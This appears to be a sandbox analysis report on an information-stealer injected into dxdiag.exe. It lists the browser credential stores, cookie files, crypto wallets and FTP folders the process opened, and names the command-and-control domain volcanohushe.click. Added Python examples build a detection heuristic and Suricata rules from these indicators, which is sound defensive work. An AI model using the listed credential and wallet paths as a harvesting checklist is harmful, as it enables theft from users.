            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exe, Directory queried (the report records 1001 queries in total; the same directories are enumerated repeatedly):
              C:\Users\user\Documents
              C:\Users\user\Documents\DUUDTUBZFW
              C:\Users\user\Documents\EIVQSAOTAQ
              C:\Users\user\Documents\GAOBCVIQIJ
              C:\Users\user\Documents\IPKGELNTQY
              C:\Users\user\Documents\MXPXCVPDVN
              C:\Users\user\Documents\NVWZAPQSQL
              C:\Users\user\Documents\QNCYCDFIJJ
              C:\Users\user\Documents\SFPUSAFIOL
              C:\Users\user\Documents\SQSJKEBWDT
            Source: Yara match, File source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR
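The rows above carry the detection-relevant point of this section: the process opening browser credential stores, extension storage, wallet folders and FTP client directories is C:\Windows\SysWOW64\dxdiag.exe, a Windows diagnostic tool rather than a browser or wallet application, and it sweeps all of these classes in one run. The following Python is an added example, not code from the report or from Joe Sandbox: it turns that observation into a triage rule over file-access events. The path patterns are derived from the report's "File opened" rows; the event tuple format, the owner-process allow-list (executable names for wallet and FTP software are illustrative), the chrome.exe install path and the breadth threshold are assumptions.

```python
"""Heuristic triage of file-access events against the artefact set this report's
injected dxdiag.exe touched. Added example, not part of the Joe Sandbox report:
the path patterns are derived from the report's "File opened" rows; the event
format, the owner-process allow-list and the thresholds are assumptions."""
import re
from collections import defaultdict

# Artefact classes and the path patterns that identify them (Windows separators,
# matched against the raw path). Ordered so the more specific classes win.
ARTEFACT_PATTERNS = {
    "browser_credential_store": [
        r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\(Login Data( For Account)?|Web Data|History)$",
        r"\\Mozilla\\Firefox\\Profiles(\\[^\\]+\\(cookies\.sqlite|prefs\.js))?$",
    ],
    "browser_extension_storage": [
        r"\\User Data\\[^\\]+\\(Local|Sync) Extension Settings\\[a-z]{30,32}$",
    ],
    "crypto_wallet": [
        r"\\(Exodus|Ledger Live|atomic|Coinomi|Bitcoin|Binance|com\.liberty\.jaxx|Electrum(-LTC)?|Guarda)(\\|$)",
    ],
    "ftp_client": [
        r"\\(FTPInfo|FTPGetter|FTPbox|SmartFTP|FTPRush|3D-FTP)(\\|$)",
    ],
}
COMPILED = {cls: [re.compile(p) for p in pats] for cls, pats in ARTEFACT_PATTERNS.items()}

# Executables that legitimately read each class (assumed allow-list; the wallet
# and FTP names are illustrative, tune them to the software actually installed).
EXPECTED_OWNERS = {
    "browser_credential_store": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_extension_storage": {"chrome.exe", "msedge.exe"},
    "crypto_wallet": {"exodus.exe", "ledger live.exe", "electrum.exe", "electrum-ltc.exe"},
    "ftp_client": {"ftpgetter.exe", "ftpbox.exe", "smartftp.exe", "ftprush.exe"},
}


def classify_path(path: str):
    """Return the artefact class of `path`, or None if it is not a known stealer target."""
    for cls, patterns in COMPILED.items():
        if any(p.search(path) for p in patterns):
            return cls
    return None


def triage(events):
    """events: iterable of (process_image, path). Groups sensitive accesses per
    process, drops the classes that process legitimately owns, grades the rest."""
    per_process = defaultdict(lambda: defaultdict(list))
    for image, path in events:
        cls = classify_path(path)
        if cls is not None:
            per_process[image][cls].append(path)
    findings = []
    for image, hits in per_process.items():
        exe = image.rsplit("\\", 1)[-1].lower()
        foreign = sorted(cls for cls in hits if exe not in EXPECTED_OWNERS[cls])
        if not foreign:
            continue  # a browser reading its own profile is normal
        findings.append({
            "process": image,
            "classes": foreign,
            "paths": sum(len(hits[cls]) for cls in foreign),
            # breadth is the tell: a stealer sweeps several classes from one process
            "verdict": "stealer-like" if len(foreign) >= 3 else "suspicious",
        })
    return findings


# Constructed events in the shape of the report's rows (process image, path opened).
DXDIAG = r"C:\Windows\SysWOW64\dxdiag.exe"
SAMPLE_EVENTS = [
    (DXDIAG, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (DXDIAG, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai"),
    (DXDIAG, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite"),
    (DXDIAG, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (DXDIAG, r"C:\Users\user\AppData\Roaming\FTPRush"),
    (DXDIAG, r"C:\Users\user\Documents\DUUDTUBZFW"),  # document enumeration, not a credential artefact
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",  # assumed benign browser path
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

On the constructed events the browser's own access to Web Data is dropped, while dxdiag.exe is reported once with four foreign classes and the verdict "stealer-like". The Documents enumeration is deliberately left unclassified: on its own it is too common to alert on, and the breadth across credential classes is what separates this behaviour from a legitimate backup or indexing process.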

            Remote Access Functionality

            Source: Yara match, File source: sslproxydump.pcap, type: PCAP
            Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR
            MITRE ATT&CK matrix (rebuilt from the report's flattened table; the number in parentheses is the count the report displays next to that technique, techniques without a number are the matrix's unmatched placeholders):
            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
            Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
            Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
            Privilege Escalation: Process Injection (311), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
            Defense Evasion: Virtualization/Sandbox Evasion (11), Process Injection (311), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), DLL Side-Loading (1), Steganography
            Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
            Discovery: System Time Discovery (1), Security Software Discovery (121), Virtualization/Sandbox Evasion (11), Process Discovery (1), File and Directory Discovery (2), System Information Discovery (23)
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
            Collection: Archive Collected Data (1), Data from Local System (41), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
            Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
            Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

            Source | Detection | Scanner
            bas.exe | 26% | ReversingLabs
            bas.exe | 31% | Virustotal
            No Antivirus matches (this line is repeated four times in the report, once per remaining antivirus table)
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            volcanohushe.click | 104.21.71.155 | true | true | - | unknown

            Name | Malicious | Antivirus Detection | Reputation
            necklacebudi.lat | false | - | high
            aspecteirs.lat | false | - | high
            energyaffai.lat | false | - | high
            https://volcanohushe.click/api | true | - | unknown
            sustainskelet.lat | false | - | high
            crosshuaht.lat | false | - | high
            rapeflowwj.lat | false | - | high
            grannyejh.lat | false | - | high
            discokeyus.lat | false | - | high
            volcanohushe.click | true | - | unknown
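The tables above list volcanohushe.click (resolved to 104.21.71.155, flagged malicious) together with the URL https://volcanohushe.click/api, plus eight .lat domains the report does not flag. Since the C2 traffic is HTTPS, the /api path is not visible on the wire, so network detection has to key on the host name, at DNS resolution and in the TLS SNI. The following Python is an added example, not code from the report or from Joe Sandbox: it reduces the rows to hosts and emits one Suricata DNS rule and one TLS-SNI rule per host. The IOC list is copied from the tables; the rule text, the SID range and the choice to include unflagged rows are assumptions an operator would tune.

```python
"""Turn the report's domain/URL rows into Suricata DNS and TLS-SNI rules.
Added example, not part of the Joe Sandbox report. The IOC rows are copied
from the report's domain tables; the rule wording and SIDs are assumptions."""
from urllib.parse import urlsplit

# (indicator, malicious flag, reputation) exactly as listed in the report's domain tables.
REPORT_IOCS = [
    ("volcanohushe.click", True, "unknown"),
    ("https://volcanohushe.click/api", True, "unknown"),
    ("necklacebudi.lat", False, "high"),
    ("aspecteirs.lat", False, "high"),
    ("energyaffai.lat", False, "high"),
    ("sustainskelet.lat", False, "high"),
    ("crosshuaht.lat", False, "high"),
    ("rapeflowwj.lat", False, "high"),
    ("grannyejh.lat", False, "high"),
    ("discokeyus.lat", False, "high"),
]


def indicator_host(indicator: str) -> str:
    """Reduce a URL or bare domain to its lower-cased host. For HTTPS C2 the
    path is encrypted, so the host is the only part a sensor can match."""
    if "://" in indicator:
        host = urlsplit(indicator).hostname
        if not host:
            raise ValueError(f"no host in {indicator!r}")
        return host.lower()
    return indicator.strip().lower()


def flagged_hosts(iocs, include_unflagged=False):
    """Unique hosts to alert on. By default only rows the report marked malicious;
    include_unflagged=True also takes the rows marked false (operator decision)."""
    return sorted({indicator_host(name) for name, malicious, _ in iocs
                   if malicious or include_unflagged})


def suricata_rules(hosts, sid_base=9_000_001):
    """One dns.query rule and one tls.sni rule per host. `endswith` anchors the
    content at the end of the name, so sub-domains of the host still match while
    names that merely contain the string in the middle do not."""
    rules, sid = [], sid_base
    for host in hosts:
        rules.append(
            f'alert dns $HOME_NET any -> any any (msg:"LummaC C2 domain lookup {host}"; '
            f'dns.query; content:"{host}"; nocase; endswith; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')
        rules.append(
            f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LummaC C2 TLS SNI {host}"; '
            f'tls.sni; content:"{host}"; nocase; endswith; '
            f'classtype:trojan-activity; sid:{sid + 1}; rev:1;)')
        sid += 2
    return rules


if __name__ == "__main__":
    for rule in suricata_rules(flagged_hosts(REPORT_IOCS)):
        print(rule)
```

With the default setting the output is two rules for volcanohushe.click; the duplicate URL row collapses onto the same host. Whether the unflagged .lat domains belong in the rule set is a judgement the report leaves open, which is why it is an explicit switch rather than a default.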
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://duckduckgo.com/chrome_newtab | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://duckduckgo.com/ac/?q= | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://volcanohushe.click/ | dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479269620.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479395130.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
            https://volcanohushe.click/H | dxdiag.exe, 00000003.00000002.1631649522.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596096341.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
            https://volcanohushe.click/apie4 | dxdiag.exe, 00000003.00000003.1621063252.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            http://crl.rootca1.amazontrust.com/rootca1.crl0 | dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            http://ocsp.rootca1.amazontrust.com0: | dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi | dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993. | dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://www.ecosia.org/newtab/ | dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmp | false | - | high
            https://volcanohushe.click/apiH | dxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp | false | -
                                                                unknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://volcanohushe.clickdxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1621063252.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579403717.0000000002CDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://volcanohushe.click/kdxdiag.exe, 00000003.00000003.1579563478.0000000002D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://x1.c.lencr.org/0dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.i.lencr.org/0dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://volcanohushe.click/apieOdxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://volcanohushe.click/apiBGdxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&udxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
